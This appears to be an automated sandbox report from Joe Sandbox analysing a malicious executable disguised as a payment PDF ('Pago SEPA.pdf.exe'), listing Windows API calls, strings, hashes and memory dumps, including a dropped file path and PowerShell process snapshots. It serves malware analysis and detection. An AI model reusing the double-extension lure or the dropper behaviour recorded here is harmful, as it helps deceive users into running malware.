                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                      • String ID: F
                                                                      • API String ID: 941294808-1304234792
                                                                      • Opcode ID: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                      • Instruction ID: b0ee482b8836f8c5ddb0523b9b95fc6b4c0959077eeb464a3039c1fdf8a9f2d7
                                                                      • Opcode Fuzzy Hash: 6e8d97c549c1634dd7cb3ad4fe557c39b8a0e77cc2ec0408d7783d5d6495b6da
                                                                      • Instruction Fuzzy Hash: F6418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF951AA1A0C738EA51DFA5
                                                                      APIs
                                                                      • lstrcpyW.KERNEL32(00425DA8,NUL,?,00000000,?,00409300,00405EE1,?,?), ref: 00405D5D
                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00409300,00405EE1,?,?), ref: 00405D81
                                                                      • GetShortPathNameW.KERNEL32(?,00425DA8,00000400), ref: 00405D8A
                                                                        • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                        • Part of subcall function 00405B59: lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                      • GetShortPathNameW.KERNEL32(004265A8,004265A8,00000400), ref: 00405DA7
                                                                      • wsprintfA.USER32 ref: 00405DC5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,004265A8,C0000000,00000004,004265A8,?,?,?,?,?), ref: 00405E00
                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0F
                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E47
                                                                      • SetFilePointer.KERNEL32(00409578,00000000,00000000,00000000,00000000,004259A8,00000000,-0000000A,00409578,00000000,[Rename],00000000,00000000,00000000), ref: 00405E9D
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EAE
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB5
                                                                        • Part of subcall function 00405BF4: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405BF8
                                                                        • Part of subcall function 00405BF4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403504,?), ref: 00405C1A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                      • API String ID: 222337774-899692902
                                                                      • Opcode ID: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                      • Instruction ID: 907d7383bdf99192a2874dfd68d01e77647b980fe5b363d6f0c9d0989479472f
                                                                      • Opcode Fuzzy Hash: e80570f2f8cd2c9f135b21ee9e2312080ea8554e7c88b9adf45b38d7f754558e
                                                                      • Instruction Fuzzy Hash: 88311F71A05B14BBD6206B229C48F6B3A6CDF45755F14043ABE41F62D2DA3CEE018AFD
                                                                      APIs
                                                                      • CharNextW.USER32(00409300,*?|<>/":,00000000,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 00406316
                                                                      • CharNextW.USER32(00409300,00409300,00409300,00000000), ref: 00406325
                                                                      • CharNextW.USER32(00409300,"C:\Users\user\Desktop\Pago SEPA.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040632A
                                                                      • CharPrevW.USER32(00409300,00409300,75923420,C:\Users\user\AppData\Local\Temp\,00000000,00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 0040633D
                                                                      Strings
                                                                      • *?|<>/":, xrefs: 00406305
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062B4
                                                                      • "C:\Users\user\Desktop\Pago SEPA.pdf.exe", xrefs: 004062F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Char$Next$Prev
                                                                      • String ID: "C:\Users\user\Desktop\Pago SEPA.pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 589700163-696370170
                                                                      • Opcode ID: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                      • Instruction ID: 54bf27a4ef4c29ba7f7e7f80dc621db20ebbd613429789f6f10e18307ece98db
                                                                      • Opcode Fuzzy Hash: 6a1238fba9ba947ddf3d1c913c8afd34c4b382e8901ee0696378a8a11e3e1ee4
                                                                      • Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED
                                                                      APIs
                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404167
                                                                      • GetSysColor.USER32(00000000), ref: 00404183
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418F
                                                                      • SetBkMode.GDI32(?,?), ref: 0040419B
                                                                      • GetSysColor.USER32(?), ref: 004041AE
                                                                      • SetBkColor.GDI32(?,?), ref: 004041BE
                                                                      • DeleteObject.GDI32(?), ref: 004041D8
                                                                      • CreateBrushIndirect.GDI32(?), ref: 004041E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                      • String ID:
                                                                      • API String ID: 2320649405-0
                                                                      • Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                      • Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
                                                                      • Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                      • Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65
                                                                      APIs
                                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                        • Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB
                                                                      • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                      • String ID: 9
                                                                      • API String ID: 163830602-2366072709
                                                                      • Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                      • Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
                                                                      • Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                      • Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
                                                                      • GetMessagePos.USER32 ref: 00404A6B
                                                                      • ScreenToClient.USER32(?,?), ref: 00404A85
                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Send$ClientScreen
                                                                      • String ID: f
                                                                      • API String ID: 41195575-1993550816
                                                                      • Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                      • Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
                                                                      • Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                      • Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5
                                                                      APIs
                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                      • MulDiv.KERNEL32(0008B51A,00000064,0008B51E), ref: 00402D4D
                                                                      • wsprintfW.USER32 ref: 00402D5D
                                                                      • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                      Strings
                                                                      • verifying installer: %d%%, xrefs: 00402D57
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                      • Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
                                                                      • Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                      • Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                      • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                      • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                      • CloseHandle.KERNEL32(?), ref: 00402914
                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                      • Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
                                                                      • Opcode Fuzzy Hash: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                      • Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
                                                                      • Instruction ID: 783455ef39ba97bad4d92773a6bd33e03ba47aaf13af7a3f43d32fd345691cd1
                                                                      • Opcode Fuzzy Hash: 6121e8ff7f107a9e0c5c71db51fa80124b77cb8196dbe3be819c2b517f5432bf
                                                                      • Instruction Fuzzy Hash: 52115971908118FEEF119F90DE8CEAE3B79FB14384F100476FA05A10A0D3B49E52AA69
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 6f5942578b6a4d889e468e107b15febb45bc82c734be8bb27ce3994811ba1900
                                                                      • Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
                                                                      • Opcode Fuzzy Hash: 6f5942578b6a4d889e468e107b15febb45bc82c734be8bb27ce3994811ba1900
                                                                      • Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D59
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                      • CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • API String ID: 3808545654-0
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                      • wsprintfW.USER32 ref: 004049E4
                                                                      • SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s
                                                                      • API String ID: 3540041739-3551169577
                                                                      APIs
                                                                      • WideCharToMultiByte.KERNEL32(?,?,0040A5C8,000000FF,C:\Users\user\AppData\Roaming\Egetrets105.met,00000400,?,?,00000021), ref: 00402583
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Egetrets105.met,?,?,0040A5C8,000000FF,C:\Users\user\AppData\Roaming\Egetrets105.met,00000400,?,?,00000021), ref: 0040258E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidelstrlen
                                                                      • String ID: C:\Users\user\AppData\Roaming\Egetrets105.met
                                                                      • API String ID: 3109718747-3140602148
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059D9
                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403257,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403496), ref: 004059E3
                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059F5
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004059D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-823278215
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402F6A,00000001,?,?,00000000,00403504,?), ref: 00402D9D
                                                                      • GetTickCount.KERNEL32 ref: 00402DBB
                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402DD8
                                                                      • ShowWindow.USER32(00000000,00000005,?,?,00000000,00403504,?), ref: 00402DE6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • API String ID: 2102729457-0
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00405121
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405172
                                                                        • Part of subcall function 0040412F: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404141
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • API String ID: 3748168415-3916222277
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,75923420,00000000,C:\Users\user\AppData\Local\Temp\,004037AB,004035C0,?), ref: 004037ED
                                                                      • GlobalFree.KERNEL32(?), ref: 004037F4
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004037D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Free$GlobalLibrary
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 1100898210-823278215
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A25
                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E5A,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Pago SEPA.pdf.exe,C:\Users\user\Desktop\Pago SEPA.pdf.exe,80000000,00000003,?,?,00000000,00403504,?), ref: 00405A35
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Similarity
                                                                      • API ID: CharPrevlstrlen
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 2709904686-1246513382
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B69
                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B81
                                                                      • CharNextA.USER32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B92
                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405E3A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                      • String ID:
                                                                      • API String ID: 190613189-0
                                                                      • Opcode ID: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                      • Instruction ID: 1b7cebc677eab2b4d2404c83280ad7709bae0e65096c4b9ca61da70a623928b5
                                                                      • Opcode Fuzzy Hash: 9427bd3955d590afca056539d981812bc3008f0de5e2293753a1e4334a8e9224
                                                                      • Instruction Fuzzy Hash: B9F06231504558AFC7029BA5DD40D9FBBB8EF06250B2540A9E800F7351D674FE019BA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588372708.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_4840000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a299af1046af568ed5c7fd74a7736599e01182ca8efdd3500932741e49eaa5a9
                                                                      • Instruction ID: b7b07fcc9822493e5ec4d0c9fc8645926b12c47ac33db8ce2eec00e2ebae1f2e
                                                                      • Opcode Fuzzy Hash: a299af1046af568ed5c7fd74a7736599e01182ca8efdd3500932741e49eaa5a9
                                                                      • Instruction Fuzzy Hash: FC524E34B00219CFDB24DF64D8547ADBBB2BF85308F148A99D84AE7251EB34AD85CF52
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.2588239853.000000000479D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0479D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_479d000_powershell.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c9ef6ca42f800a6745f2ef67e1954c412257e63b6ae2c46f95cee3f932c7e811
                                                                      • Instruction ID: 23d6405ad6d0582c3344f2020975f0b2b530b3070181aa7c9bbdf9ada4cc0055
                                                                      • Opcode Fuzzy Hash: c9ef6ca42f800a6745f2ef67e1954c412257e63b6ae2c46f95cee3f932c7e811
                                                                      • Instruction Fuzzy Hash: 6821C475604200DFCF05DF54EAC4B26BFA5FB88314F24C5A9E9098A356C33AE856DB61
                                                                      Strings
                                                                      Memory Dump Source
